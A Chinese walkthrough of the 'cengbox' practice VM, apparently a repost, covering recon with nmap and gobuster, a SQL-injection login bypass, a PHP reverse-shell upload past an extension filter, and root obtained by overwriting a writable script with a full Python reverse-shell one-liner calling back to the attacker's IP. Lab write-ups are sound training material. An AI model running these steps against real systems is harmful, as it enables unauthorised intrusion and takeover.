環(huán)境準(zhǔn)備

靶機鏈接：百度網(wǎng)盤 請輸入提取碼

提取碼：phzm

虛擬機網(wǎng)絡(luò)鏈接模式：橋接模式

攻擊機系統(tǒng)：kali linux 2021.1

信息收集

1.探測目標(biāo)靶機ip地址

arp-scan -l

2.探測目標(biāo)開放端口和服務(wù)情況

nmap -p- -A -T4 192.168.1.105

3.用gobuster掃描目標(biāo)網(wǎng)站的目錄

gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

用gobusters掃描出一個可利用目錄masteradmin

4.再次用gobuster詳細(xì)掃描masteradmin目錄

gobuster dir -u http://192.168.1.105/masteradmin -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.首先我們嘗試下是否有注入漏洞

2.發(fā)現(xiàn)‘or 1=1--' 可以注入成功 并且登錄進(jìn)去

3.進(jìn)去之后發(fā)現(xiàn)是一個能上傳文件的界面，

還是上傳我們的php-reverse-shell.php 文件，

發(fā)現(xiàn)上傳后 看不到反饋 決定抓包看下是否上傳成功。

4.抓包后看到提示，讓上傳一個后綴為ceng的文件，那就把木馬改成weiqin.ceng

5.成功上傳文件

6.開啟監(jiān)聽，拼接路徑，觸發(fā)木馬

7.回彈shell成功，發(fā)現(xiàn)是一個普通用戶

權(quán)限提升

1.嘗試回彈一個交互式shell ,應(yīng)該沒有python，

用SHELL=bash script -q /dev/null 回彈 ，

發(fā)現(xiàn)一個有執(zhí)行權(quán)限的用戶cengover。

2.在masteradmin 下面有數(shù)據(jù)庫配置文件 db.php

發(fā)現(xiàn)用戶名 root 密碼 SuperS3cR3TPassw0rd1!

3.登錄數(shù)據(jù)庫

4.正常查看數(shù)據(jù)庫信息

5.得到一組用戶名密碼masteradmin C3ng0v3R00T1!

登錄masteradmin用戶 雖然是也是普通用戶但他在user組里

發(fā)現(xiàn)md5check.py 可讀可寫，值得利用

6.谷歌搜索python reverse shell 將這句話寫入md5check.py里

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

將python -c 后面的利用即可因為md5check.py文件本身就是python腳本

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /opt/md5check.py

7.開啟監(jiān)聽成功反彈shell 發(fā)現(xiàn)是root 成功拿下！！！

總結(jié)

以上是生活随笔為你收集整理的cengbox靶机（SQL注入、文件上传漏洞）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。